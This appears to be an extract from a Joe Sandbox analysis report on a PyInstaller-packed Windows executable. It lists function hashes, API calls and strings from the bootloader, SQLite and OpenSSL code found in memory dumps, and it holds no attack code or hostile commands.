                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E902AD62F0A68386EB24EB219520BAD3B91FB85B88F444235DE6D077E9DF3CE551C740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: new[]
                                                                                                                                                                                                                                                                                                                        • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                                                                                                                                                                        • API String ID: 4059295235-3840279414
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7514e8fd5d93be79fc71e0024bcf4f49aeb845a9e117b097cb897556365a7ddf
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2bca4a7a2bd7d9875c8146458c6debcd1194685ba88fcaddfe3a11fc4b3bc1cc
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7514e8fd5d93be79fc71e0024bcf4f49aeb845a9e117b097cb897556365a7ddf
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28510551F0E28345FB259B256831EB96B91BF4AB88F484132ED6D436EEEF3CE4459304
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                                                                        • Opcode ID: fe3ce30ccacf8a50be5b66d9247a717e39d867eba63eb2cc5dedf88405610c38
                                                                                                                                                                                                                                                                                                                        • Instruction ID: ddd9ce5b82b5e67d2b8fe833a4eb0fd5dee940a530c7c2aa4600046e4a4623f0
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe3ce30ccacf8a50be5b66d9247a717e39d867eba63eb2cc5dedf88405610c38
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B41C021B0866682EE10DB1AE8406BE6392FF44BC0F8445B3EF0DC7796EE3CE5468700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(?,?,00000000,00007FF6BA3A3CBB), ref: 00007FF6BA3A8704
                                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00007FF6BA3A3CBB), ref: 00007FF6BA3A870A
                                                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00007FF6BA3A3CBB), ref: 00007FF6BA3A874C
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A8830: GetEnvironmentVariableW.KERNEL32(00007FF6BA3A388E), ref: 00007FF6BA3A8867
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6BA3A8889
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3B8238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B8251
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A2810: MessageBoxW.USER32 ref: 00007FF6BA3A28EA
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                                                                                        • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                                                                                                        • Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 61b2a6dd6bf71dfa59745e520b0f1c7072ed433f21a655892ed23786ae15a234
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97417021A19A6244FE50AB6DE8552BD2296AF847C0F8441B2EF0DC77DAEE3CE605C340
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-1404302391
                                                                                                                                                                                                                                                                                                                        • Opcode ID: c816f0f94f48910cad20fe28f8d79b4ef0e17281c282a94227bcaf6de0425057
                                                                                                                                                                                                                                                                                                                        • Instruction ID: dee3b49717c43738f845b8e74ed42333c42a0783b28af7898ce5401a50249c55
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c816f0f94f48910cad20fe28f8d79b4ef0e17281c282a94227bcaf6de0425057
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9F18C25B0AA4385FB649B219860B7977A4FF8AB84F444135EE6D877F8CF3CE445A300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007B6570
                                                                                                                                                                                                                                                                                                                        • String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH$ssl_cipher_process_rulestr
                                                                                                                                                                                                                                                                                                                        • API String ID: 4069847057-331183818
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3e8f7dbaccdc9d46899aacf333f9608422b89dcb9bc9042fe5e6119822def30e
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8b0fd8f1e5e0c8837728e75e8ae2015a81df1f648fd6a42e3b0042b94fb98154
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e8f7dbaccdc9d46899aacf333f9608422b89dcb9bc9042fe5e6119822def30e
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1DD1D372B0C68246F7698B19D460B7976F0FB44780F5540B5EAAE977DCDE3CE84A8B00
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                                                                                        • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                                                                                        • Instruction ID: ea9230b47db99563a686b8970f9a434c8d928fa84b8169c817ba5e016dbbe272
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75D17F32A08B618AEF209B69D4413AD77A1FB55788F200175EF8DD7B96DF38E495C700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E20033420ErrorLast
                                                                                                                                                                                                                                                                                                                        • String ID: %s/%s$..\s\ssl\ssl_cert.c$SSL_add_dir_cert_subjects_to_stack$SSL_add_file_cert_subjects_to_stack$calling OPENSSL_dir_read(%s)
                                                                                                                                                                                                                                                                                                                        • API String ID: 1442048445-502574948
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2e1670e1f7658ee105d96da9602f9016c1545a8356d93c4e666a0015e6880cd8
                                                                                                                                                                                                                                                                                                                        • Instruction ID: e7d12cff03be5bcc41f816b426903dca5c4914498d6c0649c3353fa4a3650644
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e1670e1f7658ee105d96da9602f9016c1545a8356d93c4e666a0015e6880cd8
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02919361B1C68241FB6AAB11E431BBA6390FF85784F8140B6EE7D477DEDE3CE4468610
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF6BA3BF0AA,?,?,0000025066049748,00007FF6BA3BAD53,?,?,?,00007FF6BA3BAC4A,?,?,?,00007FF6BA3B5F3E), ref: 00007FF6BA3BEE8C
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6BA3BF0AA,?,?,0000025066049748,00007FF6BA3BAD53,?,?,?,00007FF6BA3BAC4A,?,?,?,00007FF6BA3B5F3E), ref: 00007FF6BA3BEE98
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2401af859a48643a1efddb18fd409e2d207b16f6385c28e8799082d3e391b860
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B241C422B19B1291EA16CB1EAC005796396BF49B90F988679DF1EC7784EF3CE445D300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2C9E
                                                                                                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2D63
                                                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF6BA3A2D99
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                                                                                        • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                                                                        • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                                                                                        • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                                                                                                        • Instruction ID: c283634f10ea9c9b3aad7e49e69224c42e9663f61968a2266fcf15f34fb443d6
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D31E832708B5142EB209B69F8542AA7796BF88798F414136EF4DD7769EF3CD546C300
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1087561517
                                                                                                                                                                                                                                                                                                                        • Opcode ID: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 510fd5f302365f43d24562bde6a4bd918cf26b59e3daa872ae512ed178e97c9c
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9D15C65B0865340FB68AA62D571BFD2391AF45788FC880B2DD2E47BCEDE3DE5068350
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-2528746747
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0be6970b3b8fc0c6c1d2b94d6f812baeb9c17264f55ce6cdcf618141e46df819
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCB19F65B1864385FB19AB62D860AFC27A1BF40784F8440B2DD7D47BDDEE3CE60A8350
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • 00007FFE13343010.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FFDFB13D0A0), ref: 00007FFDFB0F90FD
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
